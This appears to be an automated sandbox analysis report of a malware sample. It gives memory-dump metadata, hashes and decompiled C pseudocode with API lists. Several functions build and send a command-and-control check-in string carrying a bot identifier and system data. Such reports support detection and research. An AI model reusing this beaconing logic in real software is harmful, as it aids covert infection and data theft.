0x00dcaffe
0x00dcaf7a
0x00dcb01a
0x00dcb021

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 2271dd67437bb47eda5f740704cddab508655e20f7342a0ce91069c7a1ef786b
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 072192729002099BCB14DF68CC81E6BBBA5FF49360B0A816DE9558B245EB30F915CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 702521A4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E702521A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E7025230B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E702523C5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E702522B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E7025230B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E702523A7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x702521a8
0x702521a9
0x702521aa
0x702521ad
0x702521af
0x702521b2
0x702521b3
0x702521b5
0x702521b6
0x702521b7
0x702521ba
0x702521c4
0x70252275
0x7025227c
0x70252285
0x702521ca
0x702521ca
0x702521d0
0x702521d6
0x702521d9
0x702521dc
0x702521e0
0x702521e5
0x702521ea
0x7025226a
0x00000000
0x702521ec
0x702521ec
0x702521f8
0x702521fa
0x70252255
0x70252255
0x7025225b
0x00000000
0x702521fc
0x7025220b
0x7025220d
0x7025220e
0x7025220f
0x70252212
0x70252212
0x70252214
0x00000000
0x70252216
0x70252216
0x70252260
0x70252218
0x70252218
0x7025221c
0x70252224
0x70252229
0x7025222e
0x7025223a
0x70252242
0x70252249
0x7025224f
0x70252253
0x00000000
0x70252253
0x70252216
0x70252214
0x00000000
0x702521fa
0x7025226e
0x7025226e
0x7025226e
0x702521ea
0x7025228a
0x70252291

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 0e68ac5032f76e6fd07392cd8bfb3793258a16bf043e1957291e5e19d422dd73
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 6F2156779042059FC711DF64C88196BB7A9BF49350F0581989D56DB185DB30F92DCBE0

Uniqueness

Uniqueness Score: -1.00%

Function 702C1C56, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: a2e0bea0542f13559c46079ae6a3fe3058bd8280f8754aec36691c93b9a1c827
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 2C117F733801019FD714CE59DC92FA773AAEB99260B25816AED04CB315E635EC618660

Uniqueness

Uniqueness Score: -1.00%

Function 702C204F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 672a7c68b0797cc21157611984522b6acb001691219e7623aabc96c007431a13
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: CD01F1333142418FD705CF28E984F6EBBE8EBE1630B15817FC4478761AEA34E849CA20

Uniqueness

Uniqueness Score: -1.00%

Function 702A048C, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db8a7d315115b2d6318304225e3ffa6f11223c6673e9702cf92d62bb76cb36b
Instruction ID: 6d7b6ca17d5adf41fca893a259fd38d1833a438a193bc54cdef843a05d3a7bb5
Opcode Fuzzy Hash: 3db8a7d315115b2d6318304225e3ffa6f11223c6673e9702cf92d62bb76cb36b
Instruction Fuzzy Hash: 71F096B36543209BC7128EAC8589B8D73ACFB0E710F11415AEB02E7650CAF4DE20C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 702A0417, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271f4ca6efd379e4f7d25fc59c1364ea2ed4ed1117ea8fead28d502adf8df95b
Instruction ID: 0ea87aff7e053e2a330e47de69359a5e7392081d344018c306045915053a1240
Opcode Fuzzy Hash: 271f4ca6efd379e4f7d25fc59c1364ea2ed4ed1117ea8fead28d502adf8df95b
Instruction Fuzzy Hash: C8F01C736102649FCB128A888849B8E72A8EB49B90F154056EA05E7250C6B4EE50DB81

Uniqueness

Uniqueness Score: -1.00%

Function 702A045B, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde975d9ee91e19d349fea5adaa53b7bc152eca7a19d5459ed097e285133e890
Instruction ID: 39e765de9a71a402cda4fc98f5e56367201992cccd1fdab93a77d6ba5bd77d99
Opcode Fuzzy Hash: bde975d9ee91e19d349fea5adaa53b7bc152eca7a19d5459ed097e285133e890
Instruction Fuzzy Hash: 88E08673911168EBC710CBD8C54498DF3FCF748B40B11045AB902D3110C670DE04CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC6A9C, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00DC6A9C(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xdcd1f0, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xdcd018; // 0xb111e430
					asm("bswap eax");
					_t32 =  *0xdcd014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xdcd010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xdcd00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0xdcd230; // 0x434a5a8
					_t2 = _t35 + 0xdce622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d144, _t34, _t33, _t32, _t31,  *0xdcd02c,  *0xdcd004, _t110);
					_t38 = E00DC7C34();
					_t39 =  *0xdcd230; // 0x434a5a8
					_t3 = _t39 + 0xdce662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xdcd230; // 0x434a5a8
						_t7 = _t92 + 0xdce66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00DC5728(_t99);
					_t44 =  *0xdcd230; // 0x434a5a8
					_t9 = _t44 + 0xdce38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xdcd230; // 0x434a5a8
					_t11 = _t48 + 0xdce33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xdcd288; // 0x51195b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xdcd230; // 0x434a5a8
						_t13 = _t88 + 0xdce685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xdcd2dc; // 0x5119630
					_a28 = E00DC8A9B(0xdcd00a, _t105 + 4);
					_t55 =  *0xdcd278; // 0x51195e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xdcd230; // 0x434a5a8
						_t16 = _t84 + 0xdce8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xdcd274; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xdcd230; // 0x434a5a8
						_t18 = _t81 + 0xdce8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xdcd1f0, _t107, 0x800);
						if(_t98 != _t107) {
							E00DC7C61(GetTickCount());
							_t62 =  *0xdcd2dc; // 0x5119630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xdcd2dc; // 0x5119630
							__imp__(_t66 + 0x40);
							_t68 =  *0xdcd2dc; // 0x5119630
							_t115 = E00DC140D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xdcc2c4);
								_push(_t115);
								_t108 = E00DC74AF();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00DC4644(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00DC53A8();
									}
									HeapFree( *0xdcd1f0, 0, _v24);
								}
								HeapFree( *0xdcd1f0, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xdcd1f0, _t107, _t98);
						}
						HeapFree( *0xdcd1f0, _t107, _a20);
					}
					HeapFree( *0xdcd1f0, _t107, _t117);
				}
				return _v16;
			}

0x00dc6a9c
0x00dc6ab0
0x00dc6ab2
0x00dc6ac0
0x00dc6ac4
0x00dc6acc
0x00dc6ad4
0x00dc6ad4
0x00dc6ad6
0x00dc6ae2
0x00dc6af1
0x00dc6af6
0x00dc6af9
0x00dc6afe
0x00dc6b01
0x00dc6b06
0x00dc6b09
0x00dc6b15
0x00dc6b22
0x00dc6b24
0x00dc6b2a
0x00dc6b2f
0x00dc6b3a
0x00dc6b3c
0x00dc6b3f
0x00dc6b45
0x00dc6b47
0x00dc6b50
0x00dc6b5b
0x00dc6b5d
0x00dc6b60
0x00dc6b60
0x00dc6b62
0x00dc6b69
0x00dc6b6e
0x00dc6b7b
0x00dc6b7d
0x00dc6b82
0x00dc6b90
0x00dc6b92
0x00dc6b97
0x00dc6b9c
0x00dc6b9f
0x00dc6ba4
0x00dc6baf
0x00dc6bb1
0x00dc6bb4
0x00dc6bb4
0x00dc6bb6
0x00dc6bc9
0x00dc6bcd
0x00dc6bd2
0x00dc6bd6
0x00dc6bd9
0x00dc6bde
0x00dc6be9
0x00dc6beb
0x00dc6bee
0x00dc6bee
0x00dc6bf0
0x00dc6bf7
0x00dc6bfa
0x00dc6bff
0x00dc6c09
0x00dc6c0b
0x00dc6c12
0x00dc6c2a
0x00dc6c2e
0x00dc6c3a
0x00dc6c3f
0x00dc6c48
0x00dc6c59
0x00dc6c5d
0x00dc6c66
0x00dc6c6c
0x00dc6c79
0x00dc6c86
0x00dc6c8c
0x00dc6c94
0x00dc6c9a
0x00dc6ca0
0x00dc6ca4
0x00dc6ca8
0x00dc6cae
0x00dc6cb2
0x00dc6cb9
0x00dc6cc0
0x00dc6cc4
0x00dc6ccf
0x00dc6cd6
0x00dc6cda
0x00dc6ce3
0x00dc6ce3
0x00dc6cf4
0x00dc6cf4
0x00dc6d03
0x00dc6d09
0x00dc6d09
0x00dc6d13
0x00dc6d13
0x00dc6d24
0x00dc6d24
0x00dc6d32
0x00dc6d32
0x00dc6d42

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00DC6ABA
GetTickCount.KERNEL32 ref: 00DC6ACE
wsprintfA.USER32 ref: 00DC6B1D
wsprintfA.USER32 ref: 00DC6B3A
wsprintfA.USER32 ref: 00DC6B5B
wsprintfA.USER32 ref: 00DC6B79
wsprintfA.USER32 ref: 00DC6B8E
wsprintfA.USER32 ref: 00DC6BAF
wsprintfA.USER32 ref: 00DC6BE9
wsprintfA.USER32 ref: 00DC6C09
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DC6C24
GetTickCount.KERNEL32 ref: 00DC6C34
RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC6C48
RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC6C66

Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1438
Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1440
Part of subcall function 00DC140D: strcpy.NTDLL ref: 00DC1457
Part of subcall function 00DC140D: lstrcat.KERNEL32(00000000,00000000), ref: 00DC1462
Part of subcall function 00DC140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DC147F

StrTrimA.SHLWAPI(00000000,00DCC2C4,00000000,05119630), ref: 00DC6C94

Part of subcall function 00DC74AF: lstrlen.KERNEL32(0511887A,00000000,00000000,00000000,00DC6CA0,00000000), ref: 00DC74BF
Part of subcall function 00DC74AF: lstrlen.KERNEL32(?), ref: 00DC74C7
Part of subcall function 00DC74AF: lstrcpy.KERNEL32(00000000,0511887A), ref: 00DC74DB
Part of subcall function 00DC74AF: lstrcat.KERNEL32(00000000,?), ref: 00DC74E6

lstrcpy.KERNEL32(00000000,?), ref: 00DC6CB2
lstrcat.KERNEL32(00000000,00000000), ref: 00DC6CC0
lstrcat.KERNEL32(00000000,00000000), ref: 00DC6CC4
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00DC6CF4
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DC6D03
HeapFree.KERNEL32(00000000,00000000,00000000,05119630), ref: 00DC6D13
HeapFree.KERNEL32(00000000,?), ref: 00DC6D24
HeapFree.KERNEL32(00000000,00000000), ref: 00DC6D32

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: 8abafe99f52e273ba5b44d7a9c3f733b15a4ad7cbb5b2eb4453515fcc86d346a
Instruction ID: c6822061859f8519c988e58aaa0187d7fb11674af99d721ae3898940831bbe4c
Opcode Fuzzy Hash: 8abafe99f52e273ba5b44d7a9c3f733b15a4ad7cbb5b2eb4453515fcc86d346a
Instruction Fuzzy Hash: A6714D72510707EFC721DB68DC88E56B7EEFB88314B190929F949C7320E635E905AB74

Uniqueness

Uniqueness Score: -1.00%

Function 00DC3CC4, Relevance: 33.3, APIs: 22, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00DC3CC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t70;
				intOrPtr _t71;
				int _t74;
				void* _t75;
				intOrPtr _t76;
				int _t79;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t108;
				intOrPtr _t113;
				signed int _t117;
				char** _t119;
				int _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr _t134;
				intOrPtr _t137;
				int _t140;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t156;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t156 = __edx;
				_t146 = __ecx;
				_t62 = __eax;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t62 = GetTickCount();
				}
				_t63 =  *0xdcd018; // 0xb111e430
				asm("bswap eax");
				_t64 =  *0xdcd014; // 0x5cb11ae7
				asm("bswap eax");
				_t65 =  *0xdcd010; // 0x15dc9586
				asm("bswap eax");
				_t66 =  *0xdcd00c; // 0x8e03bf7
				asm("bswap eax");
				_t67 =  *0xdcd230; // 0x434a5a8
				_t3 = _t67 + 0xdce622; // 0x74666f73
				_t157 = wsprintfA(_t145, _t3, 3, 0x3d144, _t66, _t65, _t64, _t63,  *0xdcd02c,  *0xdcd004, _t62);
				_t70 = E00DC7C34();
				_t71 =  *0xdcd230; // 0x434a5a8
				_t4 = _t71 + 0xdce662; // 0x74707526
				_t74 = wsprintfA(_t157 + _t145, _t4, _t70);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t74;
				if(_a8 != 0) {
					_t141 =  *0xdcd230; // 0x434a5a8
					_t8 = _t141 + 0xdce66d; // 0x732526
					_t144 = wsprintfA(_t158 + _t145, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t144;
				}
				_t75 = E00DC5728(_t146);
				_t76 =  *0xdcd230; // 0x434a5a8
				_t10 = _t76 + 0xdce38a; // 0x6d697426
				_t79 = wsprintfA(_t158 + _t145, _t10, _t75, _t156);
				_t147 = _a4;
				_t159 = _t158 + _t79;
				_t180 = _t147 -  *0xdcd2f0; // 0x0
				_t82 =  *0xdcd230; // 0x434a5a8
				_t15 = _t82 + 0xdce33b; // 0x74636126
				_t160 = _t159 + wsprintfA(_t159 + _t145, _t15, 0 | _t180 == 0x00000000);
				_t86 =  *0xdcd278; // 0x51195e0
				_t175 = _t174 + 0x1c;
				if(_t86 != 0) {
					_t137 =  *0xdcd230; // 0x434a5a8
					_t17 = _t137 + 0xdce8ea; // 0x3d736f26
					_t140 = wsprintfA(_t160 + _t145, _t17, _t86);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t140;
				}
				_t87 =  *0xdcd288; // 0x51195b0
				if(_t87 != 0) {
					_t134 =  *0xdcd230; // 0x434a5a8
					_t19 = _t134 + 0xdce685; // 0x73797326
					wsprintfA(_t160 + _t145, _t19, _t87);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xdcd2dc; // 0x5119630
				_t89 = E00DC8A9B(0xdcd00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t89;
				if(_t89 == 0) {
					L28:
					HeapFree( *0xdcd1f0, _t167, _t145);
					return _a20;
				} else {
					_t92 = RtlAllocateHeap( *0xdcd1f0, 0, 0x800);
					_a8 = _t92;
					if(_t92 == 0) {
						L27:
						HeapFree( *0xdcd1f0, _t167, _v12);
						goto L28;
					}
					E00DC7C61(GetTickCount());
					_t96 =  *0xdcd2dc; // 0x5119630
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0xdcd2dc; // 0x5119630
					__imp__(_t100 + 0x40);
					_t102 =  *0xdcd2dc; // 0x5119630
					_t163 = E00DC140D(1, _t156, _t145,  *_t102);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xdcd1f0, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xdcc2c4);
					_push(_t163);
					_t108 = E00DC74AF();
					_v8 = _t108;
					if(_t108 == 0) {
						L25:
						HeapFree( *0xdcd1f0, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					 *_t168(_a8, _t163);
					_t113 = E00DC745D(0, _a8);
					_a4 = _t113;
					if(_t113 == 0) {
						_a20 = 8;
						L23:
						E00DC53A8();
						L24:
						HeapFree( *0xdcd1f0, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t117 = E00DC6F41(_t145, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t117;
					if(_t117 == 0) {
						_t171 = _v16;
						_a20 = E00DC492B(_t171, _a4, _a12, _a16);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 0x80))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						_t131 =  *_t171;
						 *((intOrPtr*)( *_t131 + 8))(_t131);
						E00DC4C31(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t119 = _a12;
							if(_t119 != 0) {
								_t164 =  *_t119;
								_t169 =  *_a16;
								wcstombs( *_t119,  *_t119,  *_a16);
								_t122 = E00DC1000(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t122;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00DC4C31(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00dc3cc4
0x00dc3cc4
0x00dc3cc4
0x00dc3ccd
0x00dc3cd2
0x00dc3cd9
0x00dc3cdb
0x00dc3cdb
0x00dc3ce8
0x00dc3cf3
0x00dc3cf6
0x00dc3d01
0x00dc3d04
0x00dc3d09
0x00dc3d0c
0x00dc3d11
0x00dc3d14
0x00dc3d20
0x00dc3d2d
0x00dc3d2f
0x00dc3d35
0x00dc3d3a
0x00dc3d45
0x00dc3d47
0x00dc3d4a
0x00dc3d50
0x00dc3d52
0x00dc3d5a
0x00dc3d65
0x00dc3d67
0x00dc3d6a
0x00dc3d6a
0x00dc3d6c
0x00dc3d73
0x00dc3d78
0x00dc3d83
0x00dc3d85
0x00dc3d88
0x00dc3d8c
0x00dc3d96
0x00dc3d9b
0x00dc3da8
0x00dc3daa
0x00dc3daf
0x00dc3db4
0x00dc3db7
0x00dc3dbc
0x00dc3dc7
0x00dc3dc9
0x00dc3dcc
0x00dc3dcc
0x00dc3dce
0x00dc3dd5
0x00dc3dd8
0x00dc3ddd
0x00dc3de7
0x00dc3de9
0x00dc3de9
0x00dc3dec
0x00dc3dfa
0x00dc3dff
0x00dc3e03
0x00dc3e06
0x00dc3fd2
0x00dc3fda
0x00dc3fe7
0x00dc3e0c
0x00dc3e18
0x00dc3e20
0x00dc3e23
0x00dc3fc2
0x00dc3fcc
0x00000000
0x00dc3fcc
0x00dc3e2f
0x00dc3e34
0x00dc3e3d
0x00dc3e4e
0x00dc3e52
0x00dc3e5b
0x00dc3e61
0x00dc3e6e
0x00dc3e75
0x00dc3e7e
0x00dc3e84
0x00dc3fb2
0x00dc3fbc
0x00000000
0x00dc3fbc
0x00dc3e90
0x00dc3e96
0x00dc3e97
0x00dc3e9e
0x00dc3ea1
0x00dc3fa4
0x00dc3fac
0x00000000
0x00dc3fac
0x00dc3eaa
0x00dc3eb0
0x00dc3eb9
0x00dc3ec2
0x00dc3ec8
0x00dc3ecf
0x00dc3ed6
0x00dc3ed9
0x00dc3fea
0x00dc3f8c
0x00dc3f8c
0x00dc3f91
0x00dc3f9c
0x00dc3fa2
0x00000000
0x00dc3fa2
0x00dc3ee3
0x00dc3eea
0x00dc3eed
0x00dc3ef2
0x00dc3f02
0x00dc3f05
0x00dc3f0b
0x00dc3f11
0x00dc3f17
0x00dc3f1a
0x00dc3f20
0x00dc3f23
0x00dc3f28
0x00dc3f2c
0x00dc3f2c
0x00dc3f38
0x00dc3f44
0x00dc3f48
0x00dc3f4a
0x00dc3f4f
0x00dc3f51
0x00dc3f56
0x00dc3f5b
0x00dc3f68
0x00dc3f70
0x00dc3f73
0x00dc3f73
0x00dc3f4f
0x00000000
0x00dc3f3a
0x00dc3f3e
0x00dc3f75
0x00dc3f78
0x00dc3f81
0x00000000
0x00000000
0x00000000
0x00000000
0x00dc3f81
0x00dc3f40
0x00000000
0x00dc3f40
0x00dc3f38

APIs

GetTickCount.KERNEL32 ref: 00DC3CDB
wsprintfA.USER32 ref: 00DC3D28
wsprintfA.USER32 ref: 00DC3D45
wsprintfA.USER32 ref: 00DC3D65
wsprintfA.USER32 ref: 00DC3D83
wsprintfA.USER32 ref: 00DC3DA6
wsprintfA.USER32 ref: 00DC3DC7
wsprintfA.USER32 ref: 00DC3DE7
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DC3E18
GetTickCount.KERNEL32 ref: 00DC3E29
RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC3E3D
RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC3E5B

